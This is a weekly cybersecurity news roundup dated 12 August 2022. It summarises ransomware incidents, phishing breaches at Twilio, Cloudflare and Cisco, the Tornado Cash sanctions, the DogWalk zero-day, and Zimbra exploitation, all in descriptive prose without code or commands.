12 August 2022

Cyber security week in review: August 12, 2022

Cyber security week in review: August 12, 2022

A ransomware attack triggers UK emergency services system outage

United Kingdom’s National Health Service (NHS) 111 telephone service used for medical emergencies suffered a major outage caused by a ransomware attack that targeted Advanced, a firm providing digital services for NHS 111. The attack affected Advanced's Adastra client patient management solution used to refer patients for care. The company did not disclose the ransomware group behind the incident. The provider has yet to determine how the intruders breached the system and if data was stolen.

Twilio, Cloudflare employees targeted in a phishing attack

Digital communication platform Twilio has suffered a data breach after some of the company’s employees have fallen victim to a phishing campaign which tricked them into providing their login credentials. The attackers then used the stolen credentials to gain access to Twilio’s internal systems and certain customer data. According to Twilio, only “a limited number” of customer accounts were affected by the attack.

Just a day after Twilio’s disclosure the content delivery network and DDoS mitigation company Cloudflare revealed that its employees were targeted in a similar attack. The company said that although three of its employees took the bait, it was able to thwart the attack and that no Cloudflare systems were compromised.

A ransomware attack knocked out 7-Eleven stores in Denmark

Major convenience store chain, 7-Eleven, was forced to temporarily close its stores in Denmark after a ransomware attack disrupted shops’ payment and checkout systems across the country. There is no further information about the attack, including what ransomware was utilized, or whether data was stolen in the attack.

US bans Tornado Cash cryptocurrency mixer used by North Korean hackers

The US Department of the Treasury’s Office of Foreign Assets Control (OFAC) has imposed sanctions on Tornado Cash, a popular virtual currency mixer, for allegedly helping to launder more than $7 billion worth of cryptocurrency since its creation in 2019, including $455 million stolen by a North Korean state-sponsored threat actor known as Lazarus Group.

The OFAC said that Tornado Cash was also used to launder more than $96 million of malicious cyber actors’ funds stolen from the Harmony Bridge platform in June, and at least $7.8 million from the recent Nomad heist.

Rapidly evolving IoT RapperBot malware targets Linux systems using SSH brute force

A new IoT malware, dubbed “RapperBot,” has been observed targeting Linux systems. Like many other IoT malware families, RapperBot is based on Mirai source code, although it uses brute force to gain access to SSH servers instead of Telnet as implemented in Mirai.

First discovered in June 2022 by researchers at FortiGuard Labs, the malware also has functionality that allows it to maintain persistence in order to provide threat actors continued access to infected devices via SSH even after the device is rebooted or the malware has been removed.

Microsoft fixes yet another MSTD zero-day exploited in the wild

Microsoft has rolled out its August 2022 Patch Tuesday security updates designed to fix over 100 security vulnerabilities in the Windows operating system and related software, including a zero-day flaw being actively exploited by hackers.

Tracked as CVE-2022-34713 (aka “DogWalk”) the zero-day in question is a buffer overflow issue, which exists due to a boundary error in Windows Support Diagnostic Tool (MSDT) when processing files. It allows a remote attacker execute arbitrary code on the target system by tricking a victim into opening a malicious file.

The flaw affects all supported Windows versions, including Windows 11 and Windows Server 2022.

10 malicious packages found in PyPI repository

Security researchers have discovered a set of 10 software packages containing malicious code in the Python Package Index (PyPI) repository, which turned out to be droppers for information-stealing malware. According to Check Point researchers, the bad actors behind the malicious packages embedded malicious code into the package installation script so the malware would be installed on a victim’s machine unnoticed.

US authorities offer a $10 million reward for intel about Conti ransomware gang

The US State Department has announced new rewards of up to $10 million for useful information about individual members of the now-defunct Conti ransomware group. Specifically, the authorities are interested in details about five key members of the Conti group: individuals using the monikers “Professor”, “Reshaev”, “Tramp”, “Dandis”, and “Target”. The agency also published an alleged photo of a person believed to be “Target.”

Cisco confirms it was targeted by a cyberattack

Cisco Systems shared details of the May attack, which used a compromised employees’ Google account that contained passwords synced from their web browser to gain initial access to the Cisco VPN. The attacker then escalated to administrative privileges, allowing them to login to multiple systems and dropped a bunch of tools, including remote access software like LogMeIn and TeamViewer, offensive security tools such as Cobalt Strike, PowerSploit, Mimikatz, and Impacket, as well as their own backdoor accounts and persistence mechanisms.

Cisco said it was able to purge the attacker from the systems. The company attributed the attack to an initial access broker with ties to the UNC2447 cybercrime gang, Lapsus$ threat actor group, and Yanluowang ransomware operators.

Data of 48.5 million users of Shanghai's COVID app is offered for sale

A user who goes under the handle “XJP” has posted an offer on a hacker forum to sell personal data of 48.5 million users of a COVID health code mobile app run by the city of Shanghai for a price of $4,000. The seller provided a small sample of the data, which included the phone numbers, names and Chinese identification numbers and health code status.

An automotive supplier was hit with three separate ransomware attacks within two weeks

An unnamed automotive supplier had its systems breached by three separate ransomware groups, with two of the attacks launched within just two hours.

While all three threat actors used different ransomware strains and attack techniques, all of them took advantage of a firewall rule that exposed Remote Desktop Protocol (RDP) on a management server.

The first attacker, Lockbit, exfiltrated data to the Mega cloud storage service, used Mimikatz to extract passwords, and distributed their ransomware binary using PsExec. The second ransomware group, Hive, used RDP to move laterally, before dropping their ransomware just two hours after Lockbit. After the victim restored data from backups, an ALPHV/BlackCat affiliate accessed the network, installed Atera Agent, a legitimate remote access tool, to establish persistence, and exfiltrated data. Two weeks after the Lockbit and Hive attacks, the threat actor distributed their ransomware.

Experts observe a minor decline in ransomware attacks on industrial orgs after Conti shutdown

As ransomware groups have continued to target industrial organizations and infrastructures in the second quarter of 2022, security researchers have observed a slight drop in ransomware incidents from 158 in Q1 to 125 in Q2. This may be attributed to the shutdown of the Conti ransomware operation in mid-May 2022, which accounted for about 25% of the total ransomware incidents targeting industrial organizations and infrastructures in the last two quarters.

According to industrial cybersecurity company Dragos, 33% of the ransomware attacks in Q2 were conducted by the LockBit group, followed by Conti (13%), Black Basta (12%), Quantum (7%), AlphV and Hive (4% each). Globally, 37% of the ransomware attacks targeted industrial organizations and infrastructures in Europe, followed by North America (29%), Asia (26%), South America (5%), the Middle East (3%), and Africa (1%).

Experts warn of ongoing mass exploitation of Zimbra RCE vulnerability

The US Cybersecurity and Infrastructure Security Agency (CISA) has updated its Known Exploited Vulnerabilities Catalog to add two Zimbra vulnerabilities actively exploited in the wild.

The security issues (CVE-2022-27925 and CVE-2022-37042) affect the Zimbra Collaboration Suite software, and, according to researchers at Volexity, have already been exploited by threat actors hack into vulnerable Zimbra Collaboration Suite (ZCS) email servers.

CVE-2022-27925 allows a remote user to perform directory traversal attacks, while CVE-2022-37042 is an authentication bypass in MailboxImportServlet, which can be exploited to gain unauthorized access to the application. The researchers believe that CVE-2022-27925 have been exploited in conjunction with CVE-2022-37042 since at least the end of June 2022. Volexity says there are more than 1,000 compromised Zimbra instances worldwide, with most of them located in the United States, Italy, Germany, France, India, Russia, Indonesia, Switzerland, Spain, and Poland.

Back to the list

Latest Posts

Cyber security week in review: September 23, 2022

Cyber security week in review: September 23, 2022

The world in brief: Cryptomarket maker Wintermute robbed of $160M in a hack, old Python bug potentially affects 350,000 open-source projects, and more.
23 September 2022
Unpatched 15-year-old Python vulnerability puts at risk over 350,000 open-source projects

Unpatched 15-year-old Python vulnerability puts at risk over 350,000 open-source projects

The vulnerable Python tarfile module is found extensively in frameworks created by Netflix, AWS, Intel, Facebook, Google and other software.
22 September 2022
Malicious actors continue to abuse Google Tag Manager tool to install e-skimmers

Malicious actors continue to abuse Google Tag Manager tool to install e-skimmers

The researchers said they discovered three variants of malicious scripts hidden within GTM containers that function either as e-skimmers or as downloaders for installing e-skimmers.
21 September 2022